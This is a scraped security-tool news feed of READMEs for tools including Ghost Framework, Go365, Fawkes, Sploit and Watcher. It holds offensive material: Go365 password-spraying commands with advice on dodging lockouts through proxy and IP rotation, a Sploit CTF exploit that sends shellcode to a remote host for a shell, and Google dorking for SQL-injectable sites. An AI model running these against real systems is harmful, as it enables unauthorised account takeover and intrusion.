Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

Ghost Framework - An Android Post-Exploitation Framework That Exploits The Android Debug Bridge To R emotely Access An Android Device

$
0
0


About Ghost Framework
Ghost Framework is an Androidpost-exploitation framework that exploits the
Android Debug Bridge to remotely access an Android device. Ghost Framework
gives you the power and convenience of remote Android device administration.

Getting started
Ghost installation
To install Ghost Framework you should
execute the following commands.

cd ghost

chmod +x install.sh

./install.sh

Ghost uninstallation
To uninstall Ghost Framework you should
execute the following commands.

cd ghost

chmod +x uninstall.sh

./uninstall.sh


Ghost Framework execution
To run Ghost Framework you should 
execute the following command.

ghost


Why Ghost Framework
  • Simple and clear UX/UI.
Ghost Framework has a simple and clear UX/UI. 
It is easy to understand and it will be easier
for you to master the Ghost Framework.
  • Device shell access.
Ghost Framework has the ability to access the remote Android 
device shell without using OpenSSH or other protocols.
  • Controlling device screen
Ghost Framework has the ability to access device screen 
and control it remotely using mouse and keyboard.


Ghost Framework disclaimer
Usage of the Ghost Framework for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.



Freki - Malware Analysis Platform

$
0
0

 

Freki is a free and open-source malware analysis platform.


Goals
  1. Facilitate malwareanalysis and reverse engineering;
  2. Provide an easy-to-use REST API for different projects;
  3. Easy deployment (via Docker);
  4. Allow the addition of new features by the community.

Current features
  • Hash extraction.
  • VirusTotal API queries.
  • Static analysis of PE files (headers, sections, imports, capabilities, and strings).
  • Pattern matching with Yara.
  • Web interface and REST API.
  • User management.
  • Community comments.
  • Download samples.

Check our online documentation for more details.

Open an issue to suggest new features. All contributions are welcome.


How to get the source code

git clone https://github.com/crhenr/freki.git


Demo

Video demo: https://youtu.be/AW4afoaogt0.


Running

The easy way: Docker
  1. Install Docker and Docker Compose.
  2. Edit the .env file.
  3. If you are going to use it in production, edit freki.conf to enable HTTPS.
  4. Run docker-compose up or make.

Other ways

If you want to use it locally (e.g., for development), please check our online documentation for more details.



PoshBot - Powershell-based Bot Framework

$
0
0


PoshBot is a chat bot written in PowerShell. It makes extensive use of classes introduced in PowerShell 5.0. PowerShell modules are loaded into PoshBot and instantly become available as bot commands. PoshBot currently supports connecting to Slack to provide you with awesome ChatOps goodness.


What Can PoshBot Do?

Pretty much anything you want :) No seriously. PoshBot executes functions or cmdlets from PowerShell modules. Use PoshBot to connect to servers and report status, deploy code, execute runbooks, query APIs, etc. If you can write it in PowerShell, PoshBot can execute it.


Documentation

Detailed documentation can be found at ReadTheDocs.


Building PoshBot

See Building PoshBot for documentation on how to build PoshBot from source.


Changelog

Detailed changes for each release are documented in the release notes.


[YouTube] PowerShell Summit 2018 - Invoke-ChatOps: Level up and change your culture with chat and PowerShell



Quickstart

To get started now, get a SLACK-API-TOKEN for your bot:

https://my.slack.com/services/new/bot

# Install the module from PSGallery
Install-Module -Name PoshBot -Repository PSGallery

# Import the module
Import-Module -Name PoshBot

# Create a bot configuration
$botParams = @{
Name = 'name'
BotAdmins = @('<SLACK-CHAT-HANDLE>')
CommandPrefix = '!'
LogLevel = 'Info'
BackendConfiguration = @{
Name = 'SlackBackend'
Token = '<SLACK-API-TOKEN>'
}
AlternateCommandPrefixes = 'bender', 'hal'
}

$myBotConfig = New-PoshBotConfiguration @botParams

# Start a new instance of PoshBot interactively or in a job.
Start-PoshBot -Configuration $myBotConfig #-AsJob

Basic usage:

# Create a Slack backend
$backendConfig = @{Name = 'SlackBackend'; Token = '<SLACK-API-TOKEN>'}
$backend = New-PoshBotSlackBackend -Configuration $backendConfig

# Create a PoshBot configuration
$pbc = New-PoshBotConfiguration -BotAdmins @('<MY-SLACK-HANDLE>') -BackendConfiguration $backendConfig

# Save configuration
Save-PoshBotConfiguration -InputObject $pbc -Path .\PoshBotConfig.psd1

# Load configuration
$pbc = Get-PoshBotConfiguration -Path .\PoshBotConfig.psd1

# Create an instance of the bot
$bot = New-PoshBotInstance -Configuration $pbc -Backend $backend

# Start the bot
$bot.Start()

# Available commands
Get-Command -Module PoshBot

CommandType Name Version Source
----------- ---- ------- ------
Function Get-PoshBot 0.12.0 poshbot
Function Get-PoshBotConfiguration 0.12.0 poshbot
Function Get-PoshBotStatefulData 0.12.0 poshbot
Function New-PoshBotCardResponse 0.12.0 poshbot
Function New-PoshBotConfiguration 0.12.0 poshbot
Function New-PoshBotDiscordBackend 0.12.0 poshbot
Function New-PoshBotFileUpload 0.12.0 poshbot
Function New-PoshBotInstance 0.12.0 poshbot
Function New-PoshBotMiddlewareHook 0.12.0 poshbot
Function New-PoshBotScheduledTask 0.12.0 poshbot
Function New-PoshBotSlackBackend 0.12.0 poshbot
Function New-PoshBotTeamsBackend 0.12.0 poshbot
Function New-PoshBotTextResponse 0.12.0 poshbot
Function Remove-PoshBotStatefulData 0.12.0 poshbot
Function Save-PoshBotConfiguration 0.12.0 poshbot
Function Set-PoshBotStatefulData 0.12.0 poshbot
Function Start-PoshBot 0.12.0 poshbot
Function Stop-Poshbot 0.12.0 poshbot


E9Patch - A Powerful Static Binary Rewriting Tool

$
0
0


E9Patch is a powerful static binary rewriting tool for x86_64 Linux ELF binaries. E9Patch is:

  • Scalable: E9Patch can reliably rewrite large/complex binaries including web browsers (>100MB in size).
  • Compatible: The rewritten binary is a drop-in replacement of the original, with no additional dependencies.
  • Fast: E9Patch can rewrite most binaries in a few seconds.
  • Low Overheads: Both performance and memory.
  • Programmable: E9Patch is designed so that it can be easily integrated into other projects. See the E9Patch Programmer's Guide for more information.

Background

Static binary rewriting takes as input a binary file (ELF executable or shared object, e.g. a.out) and outputs a new binary file (e.g., b.out) with some patch/modification applied to it. The patched b.out can then be used as a drop-in replacement of the original a.out. Typical binary rewriting applications include instrumentation (the addition of new instructions) or patching (replacing binary code with a new version).

Static binary rewriting is notoriously difficult. One problem is that space for the new instructions must be allocated, and this typically means that existing instructions will need to be moved in order to make room. However, some of these existing instructions may also be jump targets, meaning that the all jump/call instructions in the original binary will also need to be adjusted in the rewritten binary. Unfortunately, things get complicated very quickly:

  • The complete set of targets cannot be determined statically (it is an undecidable problem in the general case of indirect calls or jumps).
  • Cross-binary calls/jumps are not uncommon, for example the compare function pointer argument to libc's qsort(). Since code pointers cannot be reliably distinguished from other data in the general case, this can mean that the entire shared library dependency tree also needs to be rewritten.

Unless all jumps and calls are perfectly adjusted, the rewritten binary will likely crash or otherwise misbehave. This is why existing static binary rewriting tools tend to scale poorly.


How E9Patch is Different

E9Patch is different to other tools in that it can statically rewrite x86_64 Linux ELF binaries without modifying the set of jump targets. To do so, E9Patch uses a set of novel low-level binary rewriting techniques, such as instruction punning, padding and eviction that can insert or replace binary code without the need to move existing instructions. Since existing instructions are not moved, the set of jump targets remains unchanged, meaning that calls/jumps do not need to be corrected (including cross binary calls/jumps).

E9Patch is therefore highly scalable by design, and can reliably rewrite very large binaries such as Google Chrome and FireFox (>100MB in size).

To find out more on how E9Patch works, please see our PLDI'2020 paper:


Additional Notes

The key to E9Patch's scalability is that it makes minimal assumptions about the input binary. However, E9Patch is not 100% assumption-free, and does assume:

  • The binary can be disassembled and does not use overlapping instructions. The default E9Tool frontend uses the Capstone disassembler.
  • The binary does not read from, or write, to the patched executable segments. For example, self-modifying code is not supported.

Most off-the-self x86_64 Linux binaries will satisfy these assumptions.

The instruction patching methodology that E9Patch uses is not guaranteed to work for every instruction. As such, the coverage of the patching may not be 100%. E9Patch will print coverage information after the rewriting process, e.g.:

    num_patched = 2766 / 2766 (100.00%)

Most applications can expect at or near 100% coverage. However, coverage can be diminished by several factors, including:

  • Patching single-byte instructions such as rets, pushes and pops. These are difficult to patch, affecting coverage.
  • Patching too many instructions.
  • Binaries with large static code or data segments that limit the space available for trampolines.

A patched binary with less than 100% coverage will still run correctly, albeit with some instructions remaining unpatched. Whether or not this is an issue depends largely on the application.


Building

Building E9Patch is very easy: simply run the build.sh script.

This should automatically build two tools:

  1. e9patch: the binary rewriter backend; and
  2. e9tool: a basic frontend for e9patch.

Examples

The e9patch tool is usable via the e9tool front-end.

For example, to add instruction printing instrumentation to all xor instructions in xterm, we can use the following command:

    $ ./e9tool --match 'asm=xor.*' --action print `which xterm`

This will write out a modified xterm into the file a.out.

The modified xterm can be run as per normal, but will print the assembly string of each executed xor instruction to stderr:

    $ ./a.out
xorl %ebp, %ebp
xorl %ebx, %ebx
xorl %eax, %eax
xorl %edx, %edx
xorl %edi, %edi
...

For a full list of supported options and modes, see:

    $ ./e9tool --help

More Examples

Patch all jump instructions with "empty" (a.k.a. "passthru") instrumentation:

    $ ./e9tool --match 'asm=j.*' --action passthru `which xterm`
$ ./a.out

Print all jump instructions with "print" instrumentation:

    $ ./e9tool --match 'asm=j.*' --action print `which xterm`
$ ./a.out

Same as above, but use "Intel" syntax:

    $ ./e9tool --match 'asm=j.*' --action print `which xterm` --syntax=intel
$ ./a.out

Patch all jump instructions with a call to an empty function:

    $ ./e9compile.sh examples/nop.c
$ ./e9tool --match 'asm=j.*' --action 'call[naked] entry@nop' `which xterm`
$ ./a.out

Patch all jump instructions with instruction count instrumentation:

    $ ./e9compile.sh examples/counter.c
$ ./e9tool --match 'asm=j.*' --action 'call entry@counter' `which xterm`
$ FREQ=10000 ./a.out

Patch all jump instructions with pretty print instrumentation:

    $ ./e9compile.sh examples/print.c
$ ./e9tool --match 'asm=j.*' --action 'call entry(addr,asmStr,instr,instrLen)@print' `which xterm`
$ ./a.out

Patch all jump instructions with "delay" instrumentation to slow the program down:

    $ ./e9compile.sh examples/delay.c
$ ./e9tool --match 'asm=j.*' --action 'call entry@delay' `which xterm`
$ DELAY=100000 ./a.out

Patch all jump instructions in Google Chrome with empty instrumentation:

    $ mkdir -p chrome
$ for FILE in /opt/google/chrome/*; do ln -sf $FILE chrome/; done
$ rm chrome/chrome
$ ./e9tool --match 'asm=j.*' --action passthru /opt/google/chrome/chrome -c 4 --start=ChromeMain -o chrome/chrome
$ cd chrome
$ ./chrome

Patch all jump instructions in Google Chrome with instruction count instrumentation:

    $ ./e9compile.sh examples/counter.c
$ mkdir -p chrome
$ for FILE in /opt/google/chrome/*; do ln -sf $FILE chrome/; done
$ rm chrome/chrome
$ ./e9tool --match 'asm=j.*' --action 'call entry@counter' /opt/google/chrome/chrome -c 4 --start=ChromeMain -o chrome/chrome
$ cd chrome
$ FREQ=10000000 ./chrome

Notes:

  • Tested for XTerm(322)
  • Tested for Google Chrome version 80.0.3987.132 (Official Build) (64-bit).

Projects

Some other projects that use E9Patch include:

  • E9AFL: Automatically insert AFL instrumentation into binaries.
  • E9Syscall: System call interception using static binary rewriting of libc.so.

Documentation

If you just want to test E9Patch out, then please try the above examples.

E9Patch is a low-level tool that is designed to be integrable into other projects. To find out more, please see the following documentation:


Bugs

E9Patch should be considered alpha-quality software. Bugs can be reported here:


Versions

The released version is an improved version of the original prototype evaluated in the paper. The implementation of the Physical Page Grouping space optimization has been improved.


Acknowledgements

This work was partially supported by the National Satellite of Excellence in Trustworthy Software Systems, funded by National Research Foundation (NRF) Singapore under the National Cybersecurity R&D (NCR) programme.



Go365 - An Office365 User Attack Tool

$
0
0


Go365 is a tool designed to perform user enumeration* and password guessing attacks on organizations that use Office365 (now/soon Microsoft365). Go365 uses a unique SOAP API endpoint on login.microsoftonline.com that most other tools do not use. When queried with an email address and password, the endpoint responds with an Azure AD Authentication and Authorization code. This code is then processed by Go365 and the result is printed to screen or an output file.

* User enumeration is performed in conjunction with a password guess attempt. Thus, there is no specific flag or funtionality to perform only user enumeration. Instead, conduct your first password guessing attack, then parse the results for valid users.


Read these three bullets!
  • This tool might not work on all domains that utilize o365. Tests show that it works with most federated domains. Some domains will only report valid users even if a valid password is also provided. Your results may vary!
  • The domains this tool was tested on showed that it did not actually lock out accounts after multiple password failures. Your results may vary!
  • This tool is intended to be used by security professionals that are authorized to "attack" the target organization's o365 instance.

Obtaining

Option 1

Download a pre-compiled binary for your OS HERE.


Option 2

Download the source and compile locally.

  1. Install Go.
  2. Go get some packages:
go get github.com/beevik/etree
go get github.com/fatih/color
go get golang.org/x/net/proxy
  1. Clone the repo.
  2. Navigate to the repo and compile ya dingus.
go build Go365.go
  1. Run the resulting binary and enjoy :)

Usage
$ ./Go365 -h

██████  ██████  ██████  ██████
██             ██ ██       ██
██  ███  ████   █████  ███████  ██████
██  ██ ██  ██      ██ ██    ██      ██
  ██████    ████  ██████   ██████  ██████

Version: 0.2
Authors: h0useh3ad, paveway3, S4R1N, EatonChips

This tool is currently in development.

Usage:
./Go365 -ul <userlist> -p <password> -d <domain> [OPTIONS]
Options:
-h, Show this stuff

Required:
-u string Username to use
- Username with or without "@domain.com"
(-u legit.user)
-ul <file> Username list to use
- File should contain one username per line
- Usernames can have "@domain.com"
- If no domain is specified, the -d domain is used
( -ul ./usernamelist.txt)
-p <string> Password to attempt
- Enclose in single quotes if it contains special characters
(-p password123 OR -p 'p@s$w0|2d')
-pl <file> Password list to use
- File should contain one password per line
- Must be used with -delay
(-pl ./passwordlist.txt)
-up <file> Userpass list to use
- One username and password separated by a ":" per line
- Be careful of duplicate usernames!
(-up ./userpasslist.txt)
-d <string> Domain to test
(-d testdomain.com)

Optional:
-w <int> Time to wait between attempts in seconds.
- Default: 1 second. 5 seconds recommended.
(-w 10)
-delay <int> Delay (in seconds) between sprays when using a password list.
- Default: 10 minutes. 60 minutes (3600 seconds) recommended.
(-delay 600)
-o <string> Output file to write to
- Will append if file exists, otherwise a file is created
(-o ./output.out)
-proxy <string> Single proxy server to use
- IP address and Port separated by a ":"
- Has only been tested using SSH SOCKS5 proxies
(-proxy 127.0.0.1:1080)
-proxyfile <string> A file with a list of proxy servers to use
- IP address and Port separated by a ":" on each line
- Randomly selects a proxy server to use before each request
- Has only been tested using SSH SOCKS5 proxies
(-proxyfile ./proxyfile.txt)
-url <string> Endpoint to send requests to
- Amazon API Gateway 'Invoke URL'
(-url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login)
-debug Debug mode.
- Print xml response

Examples
./Go365 -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com
./Go365 -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5
./Go365 -up ./userpass_list.txt -d pwnthisfakedomain.com -w 5 -o Go365output.txt
./Go365 -u legituser@pwnthisfakedomain.com -p 'coolpasswordbro!123' -w 5 -o Go365output.txt -proxy 127.0.0.1:1080
./Go365 -u legituser -pl ./pass_list.txt -delay 1800 -d pwnthisfakedomain.com -w 5 -o Go365output.txt -proxyfile ./proxyfile.txt
./Go365 -ul ./user_list.txt -p 'coolpasswordbro!123' -d pwnthisfakedomain.com -w 5 -o Go365output.txt -url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login

Account Locked Out! (Domain Defenses)

protip:You probably aren't actually locking out accounts.

After a number of queries against a target domain, results might start reporting that accounts are locked out.

Once this defense is triggered, user enumeration becomes unreliable since requests for valid and invalid users will randomly report that their accounts have been locked out.

...
[-] User not found: test.user90@pwnthisfakedomain.com
[-] User not found: test.user91@pwnthisfakedomain.com
[-] Valid user, but invalid password: test.user92@pwnthisfakedomain.com
[!] Account Locked Out: real.user1@pwnthisfakedomain.com
[-] Valid user, but invalid password: test.user93@pwnthisfakedomain.com
[!] Account Locked Out: valid.user94@pwnthisfakedomain.com
[!] Account Locked Out: jane.smith@pwnthisfakedomain.com
[-] Valid user, but invalid password: real.user95@pwnthisfakedomain.com
[-] Valid user, but invalid password: fake.user96@pwnthisfakedomain.com
[!] Account Locked Out: valid.smith@pwnthisfakedomain.com
...

This is a defensive mechanism triggered by the number of valid user queries against the target domain within a certain period of time. The number of attempts and the period of time will vary depending on the target domain since the thresholds can be customized by the target organization.


Countering Defenses

Wait time

The defensive mechanism is time and IP address based. Go365 provides options to include a wait time between requests and proxy options to distribute the source of the requests. To circumvent the defensive mechanisms on your target domain, use a long wait time and multiple proxy servers.

A wait time of AT LEAST 15 seconds is recommended. -w 15


SOCKS5 Proxies

If you still get "account locked out" responses, start proxying your requests. Proxy options have only been tested on SSH SOCKS5 dynamic proxies (ssh -D <port> user@proxyserver)

Create a bunch of SOCKS5 proxies on DO or AWS or Vultr or whatever and make a file that looks like this:

127.0.0.1:8081
127.0.0.1:8082
127.0.0.1:8083
127.0.0.1:8084
127.0.0.1:8085
127.0.0.1:8086
...

The tool will randomly iterate through the provided proxy servers and wait for the specified amount of time between requests.

-w 15 -proxyfile ./proxies.txt


Amazon API Gateway

Additionally, an endpoint url may be specified so this tool can interface with Amazon API Gateway. Setup a gateway to point to the https://login.microsoftonline.com/rst2.srf endpoint, then set the -url parameter to the provided Invoke URL. Your IP should be rotated with each request.

-url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login



Scilla - Information Gathering Tool (DNS/Subdomain/Port Enumeration)

$
0
0


Information Gathering Tool - Dns/Subdomain/Port Enumeration


Installation

First of all, clone the repo locally

git clone https://github.com/edoardottt/scilla.git

Scilla has external dependencies, so they need to be pulled in:

go get

Working on installation...See the open issue.

For now you can run it inside the scilla folder with go run scilla.go ...

Too late.. : see this

Then use the build scripts:

  • make windows builds 32 and 64 bit binaries for Windows, and writes them to the build subfolder.

  • make linux builds 32 and 64 bit binaries for Linux, and writes them to the build subfolder.

  • make unlinux Removes binaries.

  • make fmt run the golang formatter.

  • make update Update.

  • make remod Remod.

  • make test runs the tests.

  • make clean clears out the build subfolder.


Get Started

scilla help prints the help in the command line.

usage: scilla [subcommand] { options }

Available subcommands:
- dns { -target <target (URL)> REQUIRED}
- subdomain { -target <target (URL)> REQUIRED}
- port { [-p <start-end>] -target <target (URL/IP)> REQUIRED}
- report { [-p <start-end>] -target <target (URL/IP)> REQUIRED}
- help

Examples
  • DNS enumerationscilla dns -target target.domain

  • Subdomain enumeration scilla subdomain -target target.domain

  • Port enumeration:

    • Default (all ports, so 1-65635) scilla port -target target.domain

    • Specifying ports range scilla port -p 20-90 -target target.domain

    • Specifying starting port (until the last one) scilla port -p 20- -target target.domain

    • Specifying ending port (from the first one) scilla port -p -90 -target target.domain

    • Specifying single port scilla port -p 80 -target target.domain

  • Full report:

    • Default (all ports, so 1-65635) scilla report -target target.domain

    • Specifying ports range scilla report -p 20-90 -target target.domain

    • Specifying starting port (until the last one) scilla report -p 20- -target target.domain

    • Specifying ending port (from the first one) scilla report -p -90 -target target.domain

    • Specifying single port scilla report -p 80 -target target.domain



Bento - A Minimal Fedora-Based Container For Penetration Tests And CTF With The Sweet Addition Of GUI Applications

$
0
0


A bento (弁当, bentō) is a single-portion take-out or home-packed meal of Japanese origin.

Bento Toolkit is a simple and minimal docker container for penetration testers and CTF players.

It has the portability of Docker with the addition of X, so you can also run GUI application (like burp).


Prerequisites

To run bento you need Docker and a Xorg server on your host machine. On Windows you can use vcxsrv, xming, cygwin.

We tested this config with vcxsrv and cygwin.

  • vcxsrv: just start XLaunch and follow the setup
  • cygwin: you have to install xorg first, then start XLaunch.

Installation
  • git clone https://github.com/higatowa/bento && cd ./bento
  • generate keypair and put authorized_keys, containing your public key, in ./keys.
  • docker build -t bento .
  • Since we need to forward X to our machine we need first to get its ip, and then to execute: docker run --cap-add=NET_ADMIN --device /dev/net/tun --sysctl net.ipv6.conf.all.disable_ipv6=0 -p 22:22 -d bento
  • Connect via ssh to the docker machine and forward port 6000 (Xorg) with ssh -R 6000:localhost:6000 -L 8080:localhost:8080 tamago@bentoip
  • On first login you will be asked to change the password.

For GUI tools just run them from the terminal:



 

Current tools and utilities

We don't like bloateddistros so we are keeping this container as minimal as possible, adding only tools useful for web and infrastructure PT and CTF but, remember, we are always open to suggestions.

Here is a list of tools and utilities: burp suite, gobuster, seclist, odat, impacket, sqlmap, sqlplus, mysql-client, openvpn, bytecode-viewer, ghidra.



Bheem - Simple Collection Of Small Bash-Scripts Which Runs Iteratively To Carry Out Various Tools And Recon Process

$
0
0


Project Bheem is a simple collection of small bash-scripts which runs iteratively to carry out various tools and recon process & store output in an organized way. This project was created initially for automation of Recon for personal usage and was never meant to be public as there is nothing fancy about it but due to request by community, Project Bheem is now Public.
Please feel free to improve it in any way you can. There is no secret sauce involved and it's just a set of commands and existing tools written in bash-scripts for simple Recon Automation.

Project Bheem Supports an approach of Recon from @harshbothra_'s Scope Based Recon Methodology. Currently this tools supports performing recon for:

  1. Small Scope (single urls in scope) : Performs a limited recon & useful when only a few urls are provided in scope
  2. Medium Scope (*.target.com in scope) : Performs recon to enumerate more assets and give you more options to attack on.
  3. Large Scope (Everything in Scope) : Performs almost every possible recon vector from subdomain enumeration to fuzzing.

A few features like port scanning might not be working in the current build and some of the newly released tools might also be missed. we are working on upgrading the tool but feel free to fork, upgrade and make a pull request (Ensure that tool is not breaking).


A big thanks to "Kathan Patel" for restructuring Project Bheem to Support Scope Based Recon.

Pre-Requisite
  1. Make sure to have "Go" latest version is installed and paths are correctly set.

Installation
  1. Clone the repository
  2. Run the following script to install necessary tools: sh install.sh
  3. The arsenal directory contains a set of small scripts used to automate Bheem. Give executable permissions to scripts in this directory.
  4. Navigate to ~/arsenal directory and Simply run following command to see all the supported options provided in Bheem:

./Bheem.sh -h

  1. To use it over vps for performing recon on larger set of targets perform following command:

screen -S <screen_name>~/arsenal/Bheem.sh -h

  1. This will keep Bheem running even if the SSH Connection is terminated or you turn off your local machine.

Sample Usage
  1. Small Scope Recon : Bheem -t targetfile -S
  2. Medium Scope Recon : Bheem -t targetfile -M
  3. Large Scope Recon : Bheem -t targetfile -L

targetfile contains list of domains to perform Recon. For example: targettest.com


Side Notes
  1. If you don't want to use specific module, just comment it out and it won't be used anymore.

Tools Used
  1. Nuclei
  2. HTTPX
  3. GF & GF-Patterns
  4. Secret Finder
  5. Heartbleed Oneliner
  6. AMASS
  7. Subfinder
  8. Assetfinder
  9. JSScan
  10. FavFreak
  11. Waybackurls
  12. Gau
  13. Parallel
  14. asnip
  15. dirsearch
  16. gowitness
  17. subjack
  18. CORS Scanner
  19. git-hound
  20. Shuffledns
  21. Massdns

~ Other onliners and tools to be added.


PR Notes
  1. If there is any GO Version/Path related issues, please do not create a PR for it.
  2. Please create a PR for the Feature Request.
  3. If there is any missing part in install.sh please create a PR for it.
  4. For specific tool related issue such as installation for X tool used by Bheem is not successful, please do not create a PR for it. As this issue is required to be Raise to the specific Tool Owner.

Future Plans/Under Development

1. Adding Directory Enumeration2. Adding Subdomain Bruteforcing3. Adding HTTP Desync Scanner 4. Adding Vulnerable Software & Exploit Suggester 5. Adding Oneline Scanner for CORS, CRLF & Other Vectors 6. Adding Visual Recon


Special Thanks

Every single application security community member and tool developers. Special Thanks to:

  1. Project Discovery (Httpx, Subfinder, chaos, nuclei)
  2. OWASP (Amass)
  3. Tomnomnom (Assetfinder, Waybackurls, GF)
  4. Devansh (FavFreak)
  5. Imran (Heartbleed oneliner)
  6. M4ll0k (Secret Finder)
  7. lc (gau)
  8. tillson (git-hound)
  9. ffuf (ffuf)
  10. sensepost (gowitness)
  11. defparam (smuggler)
  12. haccer (subjack)
  13. crt.sh (YashGoti)

Please feel free to contribute.



Fawkes - Tool To Search For Targets Vulnerable To SQL Injection (Performs The Search Using Google Search Engine)

$
0
0


Fawkes is a tool to search for targets vulnerable to SQL Injection. Performs the search using Google search engine.


Options
    -q, --query      - Dork that will be used in the search engine.
-r, --results - Number of results brought by the search engine.
-s, --start-page - Home page of search results.
-t, --timeout - Timeout of requests.
-v, --verbose - Enable verbosity.

Examples:
python3 fawkes.py --query 'noticias.php?id=10' --timeout 3 --verbose
python3 fawkes.py --query 'admin.php?id=1' --timeout 3 --verbose


Sploit - Go Package That Aids In Binary Analysis And Exploitation

$
0
0


Sploit is a Go package that aids in binary analysis and exploitation. The motivating factor behind the development of sploit is to be able to have a well designed API with functionality that rivals some of the more common Python exploit development frameworks while taking advantage of the Go programming language. Excellent cross-compiler support, goroutines, powerful crypto libraries, and static typing are just a few of the reasons for choosing Go.

This project is inspired by pwntools and other awesome projects. It is still early in development. Expect for this project to be focused heavily on shellcoding, binary patching, ROP stack construction, and general binary analysis.


Solution for a CTF Challenge
package main;

import(
sp "github.com/zznop/sploit"
)

var arch = &sp.Processor {
Architecture: sp.ArchI386,
Endian: sp.LittleEndian,
}

var scInstrs = `mov al, 0xb /* __NR_execve */
sub esp, 0x30 /* Get pointer to /bin/sh (see below) */
mov ebx, esp /* filename (/bin/sh) */
xor ecx, ecx /* argv (NULL) */
xor edx, edx /* envp (NULL) */
int 0x80`

func main() {
shellcode, _ := sp.Asm(arch, scInstrs)
r, _ := sp.NewRemote("tcp", "some.pwnable.on.the.interwebz:10800")
defer r.Close()
r.RecvUntil([]byte("HELLO:"), true)

// Leak a stack address
r.Send(append([]byte("/bin/sh\x00AAAAAAAAAAAA"), sp.PackUint32LE(0x08048087)...))
resp, _ := r.RecvN(20)
leakAddr := sp.UnpackUint32LE(resp[0:4])

// Pop a shell
junk := make( []byte, 20-len(shellcode))
junk = append(junk, sp.PackUint32LE(leakAddr-4)...)
r.Send(append(shellcode, junk...))
r.Interactive()
}

Compiling Assembly to Machine Code
package main;

import(
"github.com/zznop/sploit"
"encoding/hex"
"fmt"
)

func main() {
instrs := "mov rcx, r12\n" +
"mov rdx, r13\n" +
"mov r8, 0x1f\n" +
"xor r9, r9\n" +
"sub rsp, 0x8\n" +
"mov qword [rsp+0x20], rax\n"

arch := &sploit.Processor {
Architecture: sploit.ArchX8664,
Endian: sploit.LittleEndian,
}

opcode, _ := sploit.Asm(arch, instrs)
fmt.Printf("Opcode bytes:\n%s\n", hex.Dump(opcode))
}
$ ./assemble_example
Opcode bytes:
00000000 4c 89 e1 4c 89 ea 49 c7 c0 1f 00 00 00 4d 31 c9 |L..L..I......M1.|
00000010 48 83 ec 08 48 89 44 24 28 |H...H.D$(|

Disassembling Code in an ELF Executable
package main;

import(
"github.com/zznop/sploit"
"fmt"
)

var program = "../test/prog1.x86_64"

func main() {
elf, _ := sploit.NewELF(program)
vaddr := uint64(0x1135)
count := 34
fmt.Printf("Disassembling %v bytes at vaddr:%08x\n", count, vaddr)
disasm, _ := elf.Disasm(vaddr, count)
fmt.Print(disasm)
}
$ ./disassemble_example
Disassembling 34 bytes at vaddr:00001135
00001135: push rbp
00001136: mov rbp, rsp
00001139: sub rsp, 0x10
0000113d: mov dword ptr [rbp - 4], edi
00001140: mov qword ptr [rbp - 0x10], rsi
00001144: lea rdi, [rip + 0xeb9]
0000114b: call 0x1030
00001150: mov eax, 0
00001155: leave
00001156: ret

Querying and Filtering ROP Gadgets
package main;

import(
"github.com/zznop/sploit"
)

var program = "../test/prog1.x86_64"

func main() {
elf, _ := sploit.NewELF(program)
rop, _ := elf.ROP()

matched, _ := rop.InstrSearch("pop rbp")
matched.Dump()
}
0000111f: pop rbp ; ret
0000111d: add byte ptr [rcx], al ; pop rbp ; ret
00001118: mov byte ptr [rip + 0x2f11], 1 ; pop rbp ; ret
00001113: call 0x1080 ; mov byte ptr [rip + 0x2f11], 1 ; pop rbp ; ret
000011b7: pop rbp ; pop r14 ; pop r15 ; ret
000011b3: pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
000011b2: pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
000011af: add esp, 8 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
000011ae: add rsp, 8 ; pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
...

Dependencies

Some of Sploit's functionality relies on external dependencies. For instance, Sploit uses GCC's GAS assembler to compile assembly code and capstone to disassemble compiled code as part of the API exposed by asm.go.

Install capstone:

git clone https://github.com/aquynh/capstone.git --branch 4.0.2 --single-branch
cd capstone
make
sudo make install

Install GCC cross-compilers. The following commands assume you are running Debian or Ubuntu on a Intel workstation and may need changed if running another Linux distro:

sudo apt install gcc gcc-arm-linux-gnueabi gcc-aarch64-linux-gnu gcc-mips-linux-gnu \
gcc-mipsel-linux-gnu gcc-powerpc-linux-gnu


Watcher - Open Source Cybersecurity Threat Hunting Platform

$
0
0


Watcher is a Django & React JS automated platform for discovering new potentially cybersecurity threats targeting your organisation.

It should be used on webservers and available on Docker.


Watcher capabilities

Useful as a bundle regrouping threat hunting/intelligence automated features.


Additional features
  • Create cases on TheHive and events on MISP.
  • Integrated IOCs export to TheHive and MISP.
  • LDAP & Local Authentication.
  • Email notifications.
  • Ticketing system feeding.
  • Admin interface.
  • Advance users permissions & groups.

Involved dependencies

Screenshots

Watcher provides a powerful user interface for data visualization and analysis. This interface can also be used to manage Watcher usage and to monitor its status.

Threats detection


 

Keywords detection


 

Malicious domain names monitoring


 

IOCs export to TheHive & MISP


 

Potentially malicious domain names detection



Django provides a ready-to-use user interface for administrative activities. We all know how an admin interface is important for a web project: Users management, user group management, Watcher configuration, usage logs...

Admin interface



Installation

Create a new Watcher instance in ten minutes using Docker (see Installation Guide).


Platform architecture


 

Get involved

There are many ways to getting involved with Watcher:

  • Report bugs by opening Issues on GitHub.
  • Request new features or suggest ideas (via Issues).
  • Make pull-requests.
  • Discuss bugs, features, ideas or issues.
  • Share Watcher to your community (Twitter, Facebook...).

Pastebin compliant

In order to use Watcher pastebin API feature, you need to subscribe to a pastebin pro account and whitelist Watcher public IP (see https://pastebin.com/doc_scraping_api).


Thanks to Thales Group CERT (THA-CERT) and ISEN-Toulon Engineering School for allowing me to carry out this project.



SharpMapExec - A Sharpen Version Of CrackMapExec

$
0
0


A sharpen version of CrackMapExec. This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements.


